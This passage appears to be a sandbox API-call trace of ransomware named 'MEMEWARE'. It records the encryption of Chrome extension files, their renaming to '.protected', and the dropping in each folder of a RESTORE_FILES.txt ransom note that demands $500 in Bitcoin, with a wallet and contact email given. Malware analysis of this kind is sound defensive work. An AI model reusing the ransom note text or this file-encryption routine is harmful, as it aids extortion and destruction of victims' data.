halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json.protected")) returned 1 [0083.357] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.357] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.358] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\RESTORE_FILES.txt") returned 168 [0083.358] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.358] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.358] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.359] lstrlenA (lpString="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") returned 684 [0083.359] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.359] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.359] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0083.359] CloseHandle (hObject=0x164) returned 1 [0083.359] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.359] lstrcmpiW (lpString1="ar", lpString2="Windows") returned -1 [0083.359] lstrcmpiW (lpString1="ar", lpString2="Program Files") returned -1 [0083.359] lstrcmpiW (lpString1="ar", lpString2="Program Files (x86)") returned -1 [0083.360] lstrcmpiW (lpString1="ar", lpString2="$Recycle.bin") returned 1 [0083.360] lstrcmpiW (lpString1="ar", lpString2="System Volume Information") returned -1 [0083.360] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar") returned 150 [0083.360] lstrcmpW (lpString1="ar", lpString2=".") returned 1 [0083.360] lstrcmpW (lpString1="ar", lpString2="..") returned 1 [0083.360] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\*") returned 152 [0083.360] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.360] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.360] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.360] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.360] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.360] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.360] wnsprintfW (in: pszDest=0xd010e0, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\.") returned 152 [0083.360] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.360] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.360] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.360] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.360] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.360] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.360] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.360] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\..") returned 153 [0083.360] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.360] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.360] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.360] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.361] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.361] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.361] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.361] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.361] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json") returned 164 [0083.361] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.361] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.361] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.361] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.361] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.362] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json") returned 164 [0083.362] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.362] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json") returned 164 [0083.362] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.362] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json") 
returned 164 [0083.362] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.362] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.364] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.364] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.364] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.364] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.364] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.365] CloseHandle (hObject=0x168) returned 1 [0083.365] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json.protected") returned 174 [0083.365] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json.protected")) returned 1 [0083.366] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.366] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.366] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\RESTORE_FILES.txt") returned 168 [0083.366] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.366] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.366] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.367] lstrlenA (lpString="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") returned 684 [0083.367] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 
[0083.367] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.367] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.367] CloseHandle (hObject=0x164) returned 1 [0083.368] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.368] lstrcmpiW (lpString1="bg", lpString2="Windows") returned -1 [0083.368] lstrcmpiW (lpString1="bg", lpString2="Program Files") returned -1 [0083.368] lstrcmpiW (lpString1="bg", lpString2="Program Files (x86)") returned -1 [0083.368] lstrcmpiW (lpString1="bg", lpString2="$Recycle.bin") returned 1 [0083.368] lstrcmpiW (lpString1="bg", lpString2="System Volume Information") returned -1 [0083.368] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg") returned 150 [0083.368] lstrcmpW (lpString1="bg", lpString2=".") returned 1 [0083.368] lstrcmpW (lpString1="bg", lpString2="..") returned 1 [0083.368] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\*") returned 152 [0083.368] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 
[0083.368] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.368] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.368] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.368] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.368] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.368] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\.") returned 152 [0083.368] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.368] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.368] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.368] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.368] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.368] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.368] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.368] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\..") returned 153 [0083.369] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.369] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.369] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.369] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.369] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.369] lstrcmpiW (lpString1="messages.json", 
lpString2="Program Files (x86)") returned -1 [0083.369] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.369] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.369] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json") returned 164 [0083.369] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.369] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.369] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.369] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.369] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.370] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json") returned 164 [0083.370] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.370] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json") returned 164 [0083.370] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.370] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json") returned 164 [0083.370] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.370] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.372] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.372] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.372] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.372] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.373] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.373] CloseHandle (hObject=0x168) returned 1 [0083.373] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json.protected") returned 174 [0083.373] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json.protected")) returned 1 [0083.374] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.374] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.374] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\RESTORE_FILES.txt") returned 168 [0083.374] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
